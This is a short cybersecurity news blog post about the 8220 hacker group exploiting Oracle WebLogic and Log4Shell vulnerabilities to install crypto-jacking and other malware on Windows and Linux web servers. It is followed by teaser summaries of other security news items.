Hacker Squad Targets Windows & Linux Web Servers Unmercilessly

December 18, 2023
1 min read

Key Points:

  • The 8220 hacker group, originally identified by Cisco Talos in 2017, is exploiting Windows and Linux web servers using crypto-jacking malware.
  • Recently, the group targeted the Oracle WebLogic vulnerability (CVE-2017-3506) and Log4Shell (CVE-2021-44228), continuing their history of exploiting vulnerabilities such as Confluence, Log4j, Drupal, Hadoop YARN, and Apache Struts2 applications.
  • The group was also found to be taking advantage of a Remote code execution vulnerability in Oracle WebLogic Server, CVE-2020-14883, and an authentication bypass vulnerability, CVE-2020-14882. Both methods have been made public and are relatively easy to modify for malicious intentions.

The 8220 hacker group utilizes two separate exploit chains for their attacks, one leveraging an XML file for further execution of commands on the operating system. The other method executes Java code without the use of an XML file. The first chain targets different XML files depending on the operating system in question. For Linux specifically, the group downloads other files through cURL, wget, lwp-download, and python urllib.

Following the download and execution process, compromised hosts are infected with AgentTesla, rhajk, and nasqa malware variants. Imperva has published a detailed report offering further insight into the exploitation methods, commands utilized, and encoding information among other details.

The increasing sophistication and reach of hacker groups like 8220 underscore the necessity for robust cyber security measures, especially for Windows and Linux web servers which appear to be prime targets.

Latest from Blog

MediSecure hacked with massive ransomware data breach

Summary of ‘MediSecure hit by large-scale ransomware data breach’ TLDR: MediSecure, an Australian prescriptions provider, was hit by a large-scale ransomware attack. The incident is believed to have originated from one of

Equalizing cybersecurity for all

TLDR: A discussion on how organizations can enhance their cybersecurity posture with Blumira’s automated threat monitoring, detection, and response solutions. Blumira is working to lower the barrier to entry in cybersecurity for

Big cyber-attacks cost less now

Summary of Unexpectedly, the cost of big cyber-attacks is falling TLDR: Cybercrime costs are expected to rise to $23 trillion by 2027, according to Anne Neuberger Data shows that the economic impact